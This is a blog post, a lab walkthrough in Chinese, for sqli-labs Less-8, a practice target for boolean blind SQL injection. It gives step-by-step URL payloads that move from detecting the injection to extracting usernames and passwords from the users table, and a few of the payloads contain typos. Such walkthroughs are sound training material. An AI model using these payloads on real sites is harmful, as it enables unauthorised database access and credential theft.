<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>sql-labs靶场less8(盲注) | Dokiy</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="bool盲注常用的函数 database()   显示数据库名称 left(a,b)    从左侧截取a的前b位 substr(a,b,c) 从b位置开始，截取字符串a到c的长度 mid(a,b,c)  从b位置开始，截取a字符串的c位 length()    返回字符串长度 ascii()      将某个字符转换成ascii值 char()       将ascii码转换为对应的字符  打开源">
<meta property="og:type" content="article">
<meta property="og:title" content="sql-labs靶场less8(盲注)">
<meta property="og:url" content="https://dokidokiy.github.io/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/index.html">
<meta property="og:site_name" content="Dokiy">
<meta property="og:description" content="bool盲注常用的函数 database()   显示数据库名称 left(a,b)    从左侧截取a的前b位 substr(a,b,c) 从b位置开始，截取字符串a到c的长度 mid(a,b,c)  从b位置开始，截取a字符串的c位 length()    返回字符串长度 ascii()      将某个字符转换成ascii值 char()       将ascii码转换为对应的字符  打开源">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515103641066.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515105031032.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515105151868.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515112258415.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515114347238.png">
<meta property="article:published_time" content="2023-05-15T01:59:31.000Z">
<meta property="article:modified_time" content="2023-05-15T03:54:44.288Z">
<meta property="article:author" content="aurora">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://dokidokiy.github.io/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515103641066.png">
  
    <link rel="alternate" href="/atom.xml" title="Dokiy" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.2"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Dokiy</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://DokiDokiy.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-sql-labs靶场less8" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/" class="article-date">
  <time datetime="2023-05-15T01:59:31.000Z" itemprop="datePublished">2023-05-15</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      sql-labs靶场less8(盲注)
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>bool盲注常用的函数</p>
<pre><code>database()   显示数据库名称
left(a,b)    从左侧截取a的前b位
substr(a,b,c) 从b位置开始，截取字符串a到c的长度
mid(a,b,c)  从b位置开始，截取a字符串的c位
length()    返回字符串长度
ascii()      将某个字符转换成ascii值
char()       将ascii码转换为对应的字符
</code></pre>
<p>打开源码看了一下</p>
<p>这道题可以使用时间盲注，不能使用报错注入，因为报错的信息被注释掉了</p>
<p><img src="/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515103641066.png" alt="image-20230515103641066"></p>
<p>1.判断注入点</p>
<pre><code>?id=1   页面正常，但是没有显示消息
</code></pre>
<p><img src="/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515105031032.png" alt="image-20230515105031032"></p>
<p>加单引号</p>
<p><img src="/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515105151868.png" alt="image-20230515105151868"></p>
<p>页面无回显，应该是报错了</p>
<p>继续试试</p>
<pre><code>?id=1 and 1=1
?id=1 and 1=2 页面都正常，说明不是数字型注入，
?id=1&#39; and 1=1 --+  页面正常，可以正常的显示
    真      真    真
?id=1&#39; and 1=2 --+
   真       假    假
页面发生变化(没有报错，只是查不出来数据，和上面的无回显不一样)，说明是单引号闭合的字符型注入。
</code></pre>
<p>1.查看数据库版本</p>
<pre><code>?id=1&#39; and left(version(),1)=5 %23
</code></pre>
<p><img src="/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515112258415.png" alt="image-20230515112258415"></p>
<p>这个数据库的版本为5.7.42 ，上面的语句是看版本号的第一位是不是5，如果回显正常，那么说明第一位就是5</p>
<p>上图显示正常，剩下的慢慢测，一般使用脚本。</p>
<p>2.猜解数据库的长度</p>
<pre><code>?id=1&#39; and length(database(),1)&gt;&#39;a&#39; --+
</code></pre>
<p><img src="/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/image-20230515114347238.png" alt="image-20230515114347238"></p>
<p>数据库长度为 8 时，页面回显正常。这里说明下，长度要一个一个的试，这里只是验证下，在要爆信息不多的情况下可以手动试试（二分法可以提高很多效率），太多的话就建议用脚本，或者用burp 爆破。</p>
<p>3.猜数据库名字</p>
<pre><code>?id=1&#39; and left(databse(),1)&gt;&#39;a&#39; --+
</code></pre>
<p><code>left(a,b)</code>：返回a字符串从左至b位数，详细看下面用法</p>
<p>4.猜表名</p>
<pre><code>?id=1&#39; and left((select table_name from information_schema.tables where table_schema=database() limit x,1),y)=&quot;&quot;--+
</code></pre>
<p>5.猜字段名</p>
<pre><code>?id=1&#39; and left((select column_name from information_schema.columns where table_schema=database() and table_name=&quot;users&quot; limit x,1),y)=&quot;&quot;--+
</code></pre>
<p>6.猜数据</p>
<p>用户名</p>
<pre><code>?id=1&#39; and left((select username from users limit x,1),y)=&quot;&quot;--+
</code></pre>
<p>通过变换x，y的值可以得到所有的用户名 。</p>
<p>密码</p>
<pre><code>?id=1&#39; and left((select password from users limit x,1),y)=&quot;&quot;--+
</code></pre>
<p>通过变换 x，y 的值可以得到所有的密码 。</p>
<p>通过布尔盲注手工注入比较繁琐，可以用脚本。</p>
<p>下面分享脚本</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://dokidokiy.github.io/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless8/" data-id="cljwyeabd0007y0vgbhrn18x3" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2023/05/16/%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          堆叠注入
        
      </div>
    </a>
  
  
    <a href="/2023/05/15/sql-labs%E9%9D%B6%E5%9C%BAless7/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">sql-labs靶场less7</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/06/">六月 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/05/">五月 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/06/22/1.%E5%91%BD%E4%BB%A4%E6%A0%BC%E5%BC%8F%E5%92%8C%E5%9F%BA%E7%A1%80%E5%91%BD%E4%BB%A4/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/06/22/shell%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/05/22/upload-labs%E9%9D%B6%E5%9C%BA/">upload-labs靶场</a>
          </li>
        
          <li>
            <a href="/2023/05/21/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">文件上传</a>
          </li>
        
          <li>
            <a href="/2023/05/17/%E2%80%99%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%E2%80%99/">宽字节注入</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2023 aurora<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>